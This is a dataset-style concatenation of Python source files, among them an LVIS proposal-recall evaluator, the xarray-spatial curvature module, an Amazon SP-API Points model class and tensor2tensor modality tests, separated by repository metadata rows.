                ids.append(prediction["image_id"])
                boxes.append(prediction["proposals"].proposal_boxes.tensor.numpy())
                objectness_logits.append(prediction["proposals"].objectness_logits.numpy())
            proposal_data = {
                "boxes": boxes,
                "objectness_logits": objectness_logits,
                "ids": ids,
                "bbox_mode": bbox_mode,
            }
            with PathManager.open(os.path.join(self._output_dir, "box_proposals.pkl"), "wb") as f:
                pickle.dump(proposal_data, f)
        if not self._do_evaluation:
            self._logger.info("Annotations are not available for evaluation.")
            return
        self._logger.info("Evaluating bbox proposals ...")
        res = {}
        # Average recall at 100/1000 proposals, per gt-box area bucket.
        areas = {"all": "", "small": "s", "medium": "m", "large": "l"}
        for limit in [100, 1000]:
            for area, suffix in areas.items():
                stats = _evaluate_box_proposals(
                    self._predictions, self._lvis_api, area=area, limit=limit
                )
                key = "AR{}@{:d}".format(suffix, limit)
                res[key] = float(stats["ar"].item() * 100)
        self._logger.info("Proposal metrics: \n" + create_small_table(res))
        self._results["box_proposals"] = res
def _evaluate_box_proposals(dataset_predictions, lvis_api, thresholds=None, area="all", limit=None):
    """
    Evaluate detection proposal recall metrics (fast alternative to the
    official LVIS recall evaluation; results differ slightly).

    NOTE(review): the original line was truncated to "roposals(..." — the
    "def _evaluate_box_p" prefix is restored here so the module parses.

    Args:
        dataset_predictions (list[dict]): each dict holds "image_id" and
            "proposals" (with `proposal_boxes` and `objectness_logits`).
        lvis_api: LVIS API object used to look up ground-truth annotations.
        thresholds: IoU thresholds tensor; defaults to 0.5:0.95 in 0.05 steps.
        area (str): key of `areas` below, selecting a gt-box area bucket.
        limit (int or None): keep only the top-`limit` proposals per image.

    Returns:
        dict: "ar" (mean recall), "recalls", "thresholds", "gt_overlaps",
        "num_pos".
    """
    areas = {
        "all": 0,
        "small": 1,
        "medium": 2,
        "large": 3,
        "96-128": 4,
        "128-256": 5,
        "256-512": 6,
        "512-inf": 7,
    }
    # Area ranges (pixels^2) aligned with the keys above.
    area_ranges = [
        [0 ** 2, 1e5 ** 2],
        [0 ** 2, 32 ** 2],
        [32 ** 2, 96 ** 2],
        [96 ** 2, 1e5 ** 2],
        [96 ** 2, 128 ** 2],
        [128 ** 2, 256 ** 2],
        [256 ** 2, 512 ** 2],
        [512 ** 2, 1e5 ** 2],
    ]
    assert area in areas, "Unknown area range: {}".format(area)
    area_range = area_ranges[areas[area]]
    gt_overlaps = []
    num_pos = 0
    for prediction_dict in dataset_predictions:
        predictions = prediction_dict["proposals"]
        # Sort proposals by descending objectness so `limit` keeps the best.
        inds = predictions.objectness_logits.sort(descending=True)[1]
        predictions = predictions[inds]
        ann_ids = lvis_api.get_ann_ids(img_ids=[prediction_dict["image_id"]])
        anno = lvis_api.load_anns(ann_ids)
        # LVIS boxes are XYWH; convert to XYXY for IoU computation.
        gt_boxes = [
            BoxMode.convert(obj["bbox"], BoxMode.XYWH_ABS, BoxMode.XYXY_ABS) for obj in anno
        ]
        gt_boxes = torch.as_tensor(gt_boxes).reshape(-1, 4)  # guard against no boxes
        gt_boxes = Boxes(gt_boxes)
        gt_areas = torch.as_tensor([obj["area"] for obj in anno])
        if len(gt_boxes) == 0 or len(predictions) == 0:
            continue
        # Keep only gt boxes inside the requested area bucket.
        valid_gt_inds = (gt_areas >= area_range[0]) & (gt_areas <= area_range[1])
        gt_boxes = gt_boxes[valid_gt_inds]
        num_pos += len(gt_boxes)
        if len(gt_boxes) == 0:
            continue
        if limit is not None and len(predictions) > limit:
            predictions = predictions[:limit]
        overlaps = pairwise_iou(predictions.proposal_boxes, gt_boxes)
        _gt_overlaps = torch.zeros(len(gt_boxes))
        # Greedy one-to-one matching: repeatedly take the (proposal, gt) pair
        # with the highest remaining IoU, record it, then retire both.
        for j in range(min(len(predictions), len(gt_boxes))):
            max_overlaps, argmax_overlaps = overlaps.max(dim=0)
            gt_ovr, gt_ind = max_overlaps.max(dim=0)
            assert gt_ovr >= 0
            box_ind = argmax_overlaps[gt_ind]
            _gt_overlaps[j] = overlaps[box_ind, gt_ind]
            assert _gt_overlaps[j] == gt_ovr
            overlaps[box_ind, :] = -1
            overlaps[:, gt_ind] = -1
        gt_overlaps.append(_gt_overlaps)
    gt_overlaps = torch.cat(gt_overlaps, dim=0)
    gt_overlaps, _ = torch.sort(gt_overlaps)
    if thresholds is None:
        step = 0.05
        thresholds = torch.arange(0.5, 0.95 + 1e-5, step, dtype=torch.float32)
    recalls = torch.zeros_like(thresholds)
    # Recall at each IoU threshold, then averaged into AR.
    for i, t in enumerate(thresholds):
        recalls[i] = (gt_overlaps >= t).float().sum() / float(num_pos)
    ar = recalls.mean()
    return {
        "ar": ar,
        "recalls": recalls,
        "thresholds": thresholds,
        "gt_overlaps": gt_overlaps,
        "num_pos": num_pos,
    }
def _evaluate_predictions_on_lvis(lvis_gt, lvis_results, iou_type, class_names=None):
metrics = {
"bbox": ["AP", "AP50", "AP75", "APs", "APm", "APl", "APr", "APc", "APf"],
"segm": ["AP", "AP50", "AP75", "APs", "APm", "APl", "APr", "APc", "APf"],
}[iou_type]
logger = logging.getLogger(__name__)
if len(lvis_results) == 0:
logger.warn("No predictions from the model! Set scores to -1")
return {metric: -1 for metric in metrics}
if iou_type == "segm":
lvis_results = copy.deepcopy(lvis_results)
for c in lvis_results:
c.pop("bbox", None)
from lvis import LVISEval, LVISResults
lvis_results = LVISResults(lvis_gt, lvis_results)
lvis_eval = LVISEval(lvis_gt, lvis_results, iou_type)
lvis_eval.run()
lvis_eval.print_results()
results = lvis_eval.get_results()
results = {metric: float(results[metric] * 100) for metric in metrics}
logger.info("Evaluation results for {}: \n".format(iou_type) + create_small_table(results))
return results
| true | true |
1c305e7fe75eb05d9cde1edd8ef861a1997b68b6 | 7,486 | py | Python | xrspatial/curvature.py | brendancol/xarray-spatial | 36d53b75086b760cab5100a12fcbda946dd85a25 | [
"MIT"
] | null | null | null | xrspatial/curvature.py | brendancol/xarray-spatial | 36d53b75086b760cab5100a12fcbda946dd85a25 | [
"MIT"
] | null | null | null | xrspatial/curvature.py | brendancol/xarray-spatial | 36d53b75086b760cab5100a12fcbda946dd85a25 | [
"MIT"
] | null | null | null | # std lib
from functools import partial
from typing import Union
from typing import Optional
# 3rd-party
try:
import cupy
except ImportError:
class cupy(object):
ndarray = False
import dask.array as da
from numba import cuda
import numpy as np
import xarray as xr
# local modules
from xrspatial.utils import cuda_args
from xrspatial.utils import get_dataarray_resolution
from xrspatial.utils import ngjit
from xrspatial.utils import not_implemented_func
from xrspatial.utils import ArrayTypeFunctionMapping
@ngjit
def _cpu(data, cellsize):
    # Numba-jitted CPU kernel: curvature of a 2D elevation grid via a 3x3
    # finite-difference stencil. Border cells have no full neighborhood and
    # are left as NaN.
    out = np.empty(data.shape, np.float64)
    out[:] = np.nan
    rows, cols = data.shape
    for y in range(1, rows - 1):
        for x in range(1, cols - 1):
            # Second differences along the two grid axes around (y, x).
            d = (data[y + 1, x] + data[y - 1, x]) / 2 - data[y, x]
            e = (data[y, x + 1] + data[y, x - 1]) / 2 - data[y, x]
            # Scaled by 100 / cellsize^2 so output is in 1/100 of a z-unit
            # (see the `curvature` docstring in this module).
            out[y, x] = -2 * (d + e) * 100 / (cellsize * cellsize)
    return out
def _run_numpy(data: np.ndarray,
               cellsize: Union[int, float]) -> np.ndarray:
    """Curvature of a NumPy array: delegate to the jitted CPU kernel.

    Border cells are left as NaN by the kernel (edge effect not handled).
    """
    # TODO: handle border edge effect
    return _cpu(data, cellsize)
def _run_dask_numpy(data: da.Array,
                    cellsize: Union[int, float]) -> da.Array:
    """Curvature over a dask array: apply the CPU kernel per chunk with a
    one-cell halo (depth=(1, 1)) so interior chunk borders agree with the
    single-array result; the outer boundary is padded with NaN.
    """
    kernel = partial(_cpu, cellsize=cellsize)
    return data.map_overlap(
        kernel,
        depth=(1, 1),
        boundary=np.nan,
        meta=np.array(()),
    )
@cuda.jit(device=True)
def _gpu(arr, cellsize):
    # CUDA device function: curvature for the center cell of a 3x3 window.
    # `cellsize` is a 1-element array (scalar passed as a device array).
    d = (arr[1, 0] + arr[1, 2]) / 2 - arr[1, 1]
    e = (arr[0, 1] + arr[2, 1]) / 2 - arr[1, 1]
    curv = -2 * (d + e) * 100 / (cellsize[0] * cellsize[0])
    return curv
@cuda.jit
def _run_gpu(arr, cellsize, out):
    # CUDA kernel: one thread per output cell. Border cells are skipped so
    # every processed cell has a full 3x3 neighborhood; borders keep the
    # NaN the caller initialized `out` with.
    i, j = cuda.grid(2)
    di = 1
    dj = 1
    if (i - di >= 0 and i + di <= out.shape[0] - 1 and
        j - dj >= 0 and j + dj <= out.shape[1] - 1):
        out[i, j] = _gpu(arr[i - di:i + di + 1, j - dj:j + dj + 1], cellsize)
def _run_cupy(data: cupy.ndarray,
              cellsize: Union[int, float]) -> cupy.ndarray:
    """Curvature of a CuPy array via the CUDA kernel; border cells are NaN.

    Note: output dtype is float32 ('f4'), unlike the float64 CPU path.
    """
    # Kernel takes cellsize as a 1-element device array.
    cellsize_arr = cupy.array([float(cellsize)], dtype='f4')
    # TODO: add padding
    griddim, blockdim = cuda_args(data.shape)
    out = cupy.empty(data.shape, dtype='f4')
    out[:] = cupy.nan
    _run_gpu[griddim, blockdim](data, cellsize_arr, out)
    return out
def curvature(agg: xr.DataArray,
              name: Optional[str] = 'curvature') -> xr.DataArray:
    """
    Calculates, for all cells in the array, the curvature (second
    derivative) of each cell based on the elevation of its neighbors
    in a 3x3 grid. A positive curvature indicates the surface is
    upwardly convex. A negative value indicates it is upwardly
    concave. A value of 0 indicates a flat surface.
    Units of the curvature output raster are one hundredth (1/100)
    of a z-unit.
    Parameters
    ----------
    agg : xarray.DataArray
        2D NumPy, CuPy, NumPy-backed Dask xarray DataArray of elevation values.
        Must contain `res` attribute.
    name : str, default='curvature'
        Name of output DataArray.
    Returns
    -------
    curvature_agg : xarray.DataArray, of the same type as `agg`
        2D aggregate array of curvature values.
        All other input attributes are preserved.
    References
    ----------
        - arcgis: https://pro.arcgis.com/en/pro-app/latest/tool-reference/spatial-analyst/how-curvature-works.htm # noqa
    Examples
    --------
    Curvature works with NumPy backed xarray DataArray
    .. sourcecode:: python
        >>> import numpy as np
        >>> import xarray as xr
        >>> from xrspatial import curvature
        >>> flat_data = np.zeros((5, 5), dtype=np.float64)
        >>> flat_raster = xr.DataArray(flat_data, attrs={'res': (1, 1)})
        >>> flat_curv = curvature(flat_raster)
        >>> print(flat_curv)
        <xarray.DataArray 'curvature' (dim_0: 5, dim_1: 5)>
        array([[nan, nan, nan, nan, nan],
               [nan, -0., -0., -0., nan],
               [nan, -0., -0., -0., nan],
               [nan, -0., -0., -0., nan],
               [nan, nan, nan, nan, nan]])
        Dimensions without coordinates: dim_0, dim_1
        Attributes:
            res: (1, 1)
    Curvature works with Dask with NumPy backed xarray DataArray
    .. sourcecode:: python
        >>> convex_data = np.array([
            [0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0],
            [0, 0, -1, 0, 0],
            [0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0]], dtype=np.float64)
        >>> convex_raster = xr.DataArray(
            da.from_array(convex_data, chunks=(3, 3)),
            attrs={'res': (10, 10)}, name='convex_dask_numpy_raster')
        >>> print(convex_raster)
        <xarray.DataArray 'convex_dask_numpy_raster' (dim_0: 5, dim_1: 5)>
        dask.array<array, shape=(5, 5), dtype=float64, chunksize=(3, 3), chunktype=numpy.ndarray>
        Dimensions without coordinates: dim_0, dim_1
        Attributes:
            res: (10, 10)
        >>> convex_curv = curvature(convex_raster, name='convex_curvature')
        >>> print(convex_curv)  # return a xarray DataArray with Dask-backed array
        <xarray.DataArray 'convex_curvature' (dim_0: 5, dim_1: 5)>
        dask.array<_trim, shape=(5, 5), dtype=float64, chunksize=(3, 3), chunktype=numpy.ndarray>
        Dimensions without coordinates: dim_0, dim_1
        Attributes:
            res: (10, 10)
        >>> print(convex_curv.compute())
        <xarray.DataArray 'convex_curvature' (dim_0: 5, dim_1: 5)>
        array([[nan, nan, nan, nan, nan],
               [nan, -0., 1., -0., nan],
               [nan, 1., -4., 1., nan],
               [nan, -0., 1., -0., nan],
               [nan, nan, nan, nan, nan]])
        Dimensions without coordinates: dim_0, dim_1
        Attributes:
            res: (10, 10)
    Curvature works with CuPy backed xarray DataArray.
    .. sourcecode:: python
        >>> import cupy
        >>> concave_data = np.array([
            [0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0],
            [0, 0, 1, 0, 0],
            [0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0]], dtype=np.float64)
        >>> concave_raster = xr.DataArray(
            cupy.asarray(concave_data),
            attrs={'res': (10, 10)}, name='concave_cupy_raster')
        >>> concave_curv = curvature(concave_raster)
        >>> print(type(concave_curv))
        <class 'cupy.core.core.ndarray'>
        >>> print(concave_curv)
        <xarray.DataArray 'curvature' (dim_0: 5, dim_1: 5)>
        array([[nan, nan, nan, nan, nan],
               [nan, -0., -1., -0., nan],
               [nan, -1., 4., -1., nan],
               [nan, -0., -1., -0., nan],
               [nan, nan, nan, nan, nan]], dtype=float32)
        Dimensions without coordinates: dim_0, dim_1
        Attributes:
            res: (10, 10)
    """
    # Average the x/y resolution into a single cell size.
    # NOTE(review): this presumes near-square cells — confirm for rasters
    # with strongly anisotropic resolution.
    cellsize_x, cellsize_y = get_dataarray_resolution(agg)
    cellsize = (cellsize_x + cellsize_y) / 2
    # Dispatch to the numpy / cupy / dask implementation matching agg's
    # backing array type; dask+cupy is explicitly unsupported.
    mapper = ArrayTypeFunctionMapping(
        numpy_func=_run_numpy,
        cupy_func=_run_cupy,
        dask_func=_run_dask_numpy,
        dask_cupy_func=lambda *args: not_implemented_func(
            *args, messages='curvature() does not support dask with cupy backed DataArray.'),  # noqa
    )
    out = mapper(agg)(agg.data, cellsize)
    # Wrap the raw result back into a DataArray, preserving coords/dims/attrs.
    return xr.DataArray(out,
                        name=name,
                        coords=agg.coords,
                        dims=agg.dims,
                        attrs=agg.attrs)
| 34.027273 | 120 | 0.558376 |
from functools import partial
from typing import Union
from typing import Optional
# CuPy is an optional GPU dependency: fall back to a stub class so that
# module-level references to `cupy.ndarray` (used below for array-type
# dispatch) still resolve when CuPy is not installed.
try:
    import cupy
except ImportError:
    class cupy(object):
        # Placeholder attribute only; presumably compared against array types
        # inside ArrayTypeFunctionMapping — TODO confirm against xrspatial.utils.
        ndarray = False
import dask.array as da
from numba import cuda
import numpy as np
import xarray as xr
from xrspatial.utils import cuda_args
from xrspatial.utils import get_dataarray_resolution
from xrspatial.utils import ngjit
from xrspatial.utils import not_implemented_func
from xrspatial.utils import ArrayTypeFunctionMapping
@ngjit
def _cpu(data, cellsize):
    """Finite-difference curvature over interior cells; the 1-cell border is NaN."""
    nrows, ncols = data.shape
    out = np.empty((nrows, ncols), np.float64)
    out[:] = np.nan
    for row in range(1, nrows - 1):
        for col in range(1, ncols - 1):
            center = data[row, col]
            # Second differences along the two axes of the 3x3 neighborhood.
            dz_a = (data[row + 1, col] + data[row - 1, col]) / 2 - center
            dz_b = (data[row, col + 1] + data[row, col - 1]) / 2 - center
            out[row, col] = -2 * (dz_a + dz_b) * 100 / (cellsize * cellsize)
    return out
def _run_numpy(data: np.ndarray,
               cellsize: Union[int, float]) -> np.ndarray:
    """Dispatch target for plain NumPy-backed rasters."""
    return _cpu(data, cellsize)
def _run_dask_numpy(data: da.Array,
                    cellsize: Union[int, float]) -> da.Array:
    """Dispatch target for Dask-of-NumPy rasters.

    Each chunk is processed by the jitted CPU kernel; a one-cell overlap
    supplies the neighbors needed at chunk boundaries.
    """
    kernel = partial(_cpu, cellsize=cellsize)
    return data.map_overlap(kernel,
                            depth=(1, 1),
                            boundary=np.nan,
                            meta=np.array(()))
@cuda.jit(device=True)
def _gpu(arr, cellsize):
    """Curvature of the center cell of a 3x3 window (CUDA device function)."""
    center = arr[1, 1]
    dz_a = (arr[1, 0] + arr[1, 2]) / 2 - center
    dz_b = (arr[0, 1] + arr[2, 1]) / 2 - center
    return -2 * (dz_a + dz_b) * 100 / (cellsize[0] * cellsize[0])
@cuda.jit
def _run_gpu(arr, cellsize, out):
    """CUDA kernel: one thread per cell; border cells are left untouched."""
    row, col = cuda.grid(2)
    # Only interior cells have a full 3x3 neighborhood available.
    if (row >= 1 and row <= out.shape[0] - 2 and
            col >= 1 and col <= out.shape[1] - 2):
        out[row, col] = _gpu(arr[row - 1:row + 2, col - 1:col + 2], cellsize)
def _run_cupy(data: cupy.ndarray,
              cellsize: Union[int, float]) -> cupy.ndarray:
    """Dispatch target for CuPy-backed rasters; launches the CUDA kernel."""
    # The kernel expects the cell size as a one-element float32 device array.
    cellsize_dev = cupy.array([float(cellsize)], dtype='f4')
    out = cupy.empty(data.shape, dtype='f4')
    out[:] = cupy.nan
    grid, block = cuda_args(data.shape)
    _run_gpu[grid, block](data, cellsize_dev, out)
    return out
def curvature(agg: xr.DataArray,
              name: Optional[str] = 'curvature') -> xr.DataArray:
    """Compute per-cell curvature of a raster, dispatching on the array backend.

    Supports NumPy, CuPy, and Dask-of-NumPy backed DataArrays; Dask-with-CuPy
    is not implemented. The cell size is the mean of the x/y resolutions taken
    from the input's attributes.

    Returns an ``xr.DataArray`` carrying the input's coords, dims and attrs.
    """
    res_x, res_y = get_dataarray_resolution(agg)
    mean_cellsize = (res_x + res_y) / 2
    dispatch = ArrayTypeFunctionMapping(
        numpy_func=_run_numpy,
        cupy_func=_run_cupy,
        dask_func=_run_dask_numpy,
        dask_cupy_func=lambda *args: not_implemented_func(
            *args, messages='curvature() does not support dask with cupy backed DataArray.'),
    )
    result = dispatch(agg)(agg.data, mean_cellsize)
    return xr.DataArray(result,
                        name=name,
                        coords=agg.coords,
                        dims=agg.dims,
                        attrs=agg.attrs)
| true | true |
1c305e90a5c508127a5d8e97db379d8499158f06 | 4,203 | py | Python | sp_api/api/products/models/points.py | lionsdigitalsolutions/python-amazon-sp-api | 7374523ebc65e2e01e37d03fc4009a44fabf2c3b | [
"MIT"
] | null | null | null | sp_api/api/products/models/points.py | lionsdigitalsolutions/python-amazon-sp-api | 7374523ebc65e2e01e37d03fc4009a44fabf2c3b | [
"MIT"
] | null | null | null | sp_api/api/products/models/points.py | lionsdigitalsolutions/python-amazon-sp-api | 7374523ebc65e2e01e37d03fc4009a44fabf2c3b | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Selling Partner API for Pricing
The Selling Partner API for Pricing helps you programmatically retrieve product pricing and offer information for Amazon Marketplace products. # noqa: E501
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Points(object):
    """Amazon Points attached to an offer: a point count plus its monetary value.

    NOTE: originally generated by the swagger code generator; the class-level
    metadata below drives (de)serialization.

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the API definition.
    """

    swagger_types = {
        'points_number': 'int',
        'points_monetary_value': 'MoneyType'
    }

    attribute_map = {
        'points_number': 'PointsNumber',
        'points_monetary_value': 'PointsMonetaryValue'
    }

    def __init__(self, points_number=None, points_monetary_value=None):
        """Points - a model defined in Swagger."""
        self._points_number = None
        self._points_monetary_value = None
        self.discriminator = None
        if points_number is not None:
            self.points_number = points_number
        if points_monetary_value is not None:
            self.points_monetary_value = points_monetary_value

    @property
    def points_number(self):
        """Gets the points_number of this Points.

        The number of points.

        :return: The points_number of this Points.
        :rtype: int
        """
        return self._points_number

    @points_number.setter
    def points_number(self, points_number):
        """Sets the points_number of this Points.

        The number of points.

        :param points_number: The points_number of this Points.
        :type: int
        """
        self._points_number = points_number

    @property
    def points_monetary_value(self):
        """Gets the points_monetary_value of this Points.

        :return: The points_monetary_value of this Points.
        :rtype: MoneyType
        """
        return self._points_monetary_value

    @points_monetary_value.setter
    def points_monetary_value(self, points_monetary_value):
        """Sets the points_monetary_value of this Points.

        :param points_monetary_value: The points_monetary_value of this Points.
        :type: MoneyType
        """
        self._points_monetary_value = points_monetary_value

    def to_dict(self):
        """Returns the model properties as a dict."""
        result = {}
        # Plain Python 3 dict iteration; `six.iteritems` was an unnecessary
        # py2-compat shim (iteration behavior is identical under Python 3).
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(Points, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal."""
        if not isinstance(other, Points):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal."""
        return not self == other
| 30.021429 | 160 | 0.59743 |
import pprint
import re
import six
class Points(object):
    """Amazon Points attached to an offer: a point count plus its monetary value.

    NOTE: originally generated by the swagger code generator; the class-level
    metadata below drives (de)serialization.

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the API definition.
    """

    swagger_types = {
        'points_number': 'int',
        'points_monetary_value': 'MoneyType'
    }

    attribute_map = {
        'points_number': 'PointsNumber',
        'points_monetary_value': 'PointsMonetaryValue'
    }

    def __init__(self, points_number=None, points_monetary_value=None):
        """Points - a model defined in Swagger."""
        self._points_number = None
        self._points_monetary_value = None
        self.discriminator = None
        if points_number is not None:
            self.points_number = points_number
        if points_monetary_value is not None:
            self.points_monetary_value = points_monetary_value

    @property
    def points_number(self):
        """The number of points (int)."""
        return self._points_number

    @points_number.setter
    def points_number(self, points_number):
        """Set the number of points (int)."""
        self._points_number = points_number

    @property
    def points_monetary_value(self):
        """The monetary value of the points (MoneyType)."""
        return self._points_monetary_value

    @points_monetary_value.setter
    def points_monetary_value(self, points_monetary_value):
        """Set the monetary value of the points (MoneyType)."""
        self._points_monetary_value = points_monetary_value

    def to_dict(self):
        """Returns the model properties as a dict."""
        result = {}
        # Plain Python 3 dict iteration; `six.iteritems` was an unnecessary
        # py2-compat shim (iteration behavior is identical under Python 3).
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(Points, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal."""
        if not isinstance(other, Points):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal."""
        return not self == other
| true | true |
1c305e9c9d6a42f7765d960f9d6a66a5c31f95e0 | 73 | py | Python | src/checksum.py | cmolinaord/bimug_drone | f263207125fd49a772b7deeccee2e54ffd88e3d9 | [
"MIT"
] | null | null | null | src/checksum.py | cmolinaord/bimug_drone | f263207125fd49a772b7deeccee2e54ffd88e3d9 | [
"MIT"
] | null | null | null | src/checksum.py | cmolinaord/bimug_drone | f263207125fd49a772b7deeccee2e54ffd88e3d9 | [
"MIT"
def checksum(str):
    """XOR-fold the character codes of *str*; return the result as a hex string."""
    acc = 0
    for ch in str:
        acc ^= ord(ch)
    return hex(acc)
def checksum(str):
    # XOR of every character code in the input, formatted as hex (e.g. '0x3').
    result = 0
    for character in str:
        result = result ^ ord(character)
    return hex(result)
| true | true |
1c305eb2aa507e845aefc969185000164f9214bf | 26 | py | Python | lztools/enums/RemoteTool.py | Zanzes/lztools | 4091416464cbb441f5af26ade6a03ff18ae1bf01 | [
"MIT"
] | null | null | null | lztools/enums/RemoteTool.py | Zanzes/lztools | 4091416464cbb441f5af26ade6a03ff18ae1bf01 | [
"MIT"
] | null | null | null | lztools/enums/RemoteTool.py | Zanzes/lztools | 4091416464cbb441f5af26ade6a03ff18ae1bf01 | [
"MIT"
] | null | null | null | IdentifyOS = "identify_os" | 26 | 26 | 0.807692 | IdentifyOS = "identify_os" | true | true |
1c305ed176e0c14f937447f3722fb2006126a9d6 | 4,682 | py | Python | tensor2tensor/layers/modalities_test.py | sivaramakrishna7/tensor2tensor | eb0118d3f459913133e3d68a96944480a928bff1 | [
"Apache-2.0"
] | 5 | 2019-03-28T03:52:32.000Z | 2021-02-24T07:09:26.000Z | tensor2tensor/layers/modalities_test.py | sivaramakrishna7/tensor2tensor | eb0118d3f459913133e3d68a96944480a928bff1 | [
"Apache-2.0"
] | null | null | null | tensor2tensor/layers/modalities_test.py | sivaramakrishna7/tensor2tensor | eb0118d3f459913133e3d68a96944480a928bff1 | [
"Apache-2.0"
] | 2 | 2018-08-07T03:43:09.000Z | 2019-12-09T06:41:40.000Z | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Modalities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import modalities
from tensor2tensor.utils import expert_utils
import tensorflow as tf
class ModalityTest(tf.test.TestCase):
  """Shape tests for SymbolModality's sharded bottom/top/loss ops."""

  def _random_ints(self, high, size):
    """Uniform random ints in [0, high - 1].

    Replaces the deprecated `np.random.random_integers` (which has an
    inclusive upper bound, hence the original `-1 +` shift) with the
    equivalent `np.random.randint` range.
    """
    return np.random.randint(0, high, size=size)

  def testSymbolModalityInputs(self):
    """bottom_sharded embeds int ids to shape [batch, length, 1, hidden]."""
    batch_size = 10
    num_datashards = 5
    length = 5
    vocab_size = 5000
    hidden_size = 9
    model_hparams = common_hparams.basic_params1()
    model_hparams.hidden_size = hidden_size
    model_hparams.mode = tf.estimator.ModeKeys.TRAIN
    x = self._random_ints(vocab_size, (batch_size, length, 1, 1))
    m = modalities.SymbolModality(model_hparams, vocab_size)
    data_parallelism = expert_utils.Parallelism(
        ["/device:CPU:0"] * num_datashards)
    with self.test_session() as session:
      xs = tf.split(x, num_datashards)
      sharded_output = m.bottom_sharded(xs, data_parallelism)
      output = tf.concat(sharded_output, 0)
      session.run(tf.global_variables_initializer())
      res = session.run(output)
    self.assertEqual(res.shape, (batch_size, length, 1, hidden_size))

  def _check_symbol_modality_targets(self, factored_logits):
    """Shared body for the two targets tests below.

    Builds sharded logits and loss from random body output / targets and
    checks the logits shape and that the loss is a scalar. The two public
    tests were byte-for-byte duplicates except for `factored_logits`.
    """
    batch_size = 10
    num_datashards = 5
    length = 6
    height = 7
    hidden_size = 9
    vocab_size = 11
    model_hparams = common_hparams.basic_params1()
    if factored_logits:
      model_hparams.factored_logits = True
    model_hparams.hidden_size = hidden_size
    model_hparams.mode = tf.estimator.ModeKeys.TRAIN
    body_output = self._random_ints(
        100, (batch_size, length, height, hidden_size))
    targets = self._random_ints(
        vocab_size, (batch_size, length, height, 1))
    m = modalities.SymbolModality(model_hparams, vocab_size)
    data_parallelism = expert_utils.Parallelism(
        ["/device:CPU:0"] * num_datashards)
    with self.test_session() as session:
      sharded_body_output = tf.split(tf.to_float(body_output), num_datashards)
      sharded_targets = tf.split(targets, num_datashards)
      sharded_logits = m.top_sharded(sharded_body_output, sharded_targets,
                                     data_parallelism)
      train_loss = m.loss_sharded(sharded_logits, sharded_targets,
                                  data_parallelism)
      logits = tf.concat(sharded_logits, 0)
      session.run(tf.global_variables_initializer())
      res1, res2 = session.run((logits, train_loss))
    self.assertEqual(res1.shape, (batch_size, length, height, 1, vocab_size))
    self.assertEqual(res2.shape, ())

  def testSymbolModalityTargets(self):
    self._check_symbol_modality_targets(factored_logits=False)

  def testSymbolModalityTargetsFactored(self):
    self._check_symbol_modality_targets(factored_logits=True)
if __name__ == "__main__":
tf.test.main()
| 39.016667 | 78 | 0.709099 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import modalities
from tensor2tensor.utils import expert_utils
import tensorflow as tf
class ModalityTest(tf.test.TestCase):
  """Shape tests for SymbolModality's sharded bottom/top/loss ops."""

  def testSymbolModalityInputs(self):
    """bottom_sharded embeds int ids to shape [batch, length, 1, hidden]."""
    batch_size = 10
    num_datashards = 5
    length = 5
    vocab_size = 5000
    hidden_size = 9
    model_hparams = common_hparams.basic_params1()
    model_hparams.hidden_size = hidden_size
    model_hparams.mode = tf.estimator.ModeKeys.TRAIN
    # random_integers has inclusive bounds, so `-1 +` yields [0, vocab_size - 1].
    # NOTE(review): np.random.random_integers is deprecated in favor of randint.
    x = -1 + np.random.random_integers(
        vocab_size, size=(batch_size, length, 1, 1))
    m = modalities.SymbolModality(model_hparams, vocab_size)
    data_parallelism = expert_utils.Parallelism(
        ["/device:CPU:0"] * num_datashards)
    with self.test_session() as session:
      xs = tf.split(x, num_datashards)
      sharded_output = m.bottom_sharded(xs, data_parallelism)
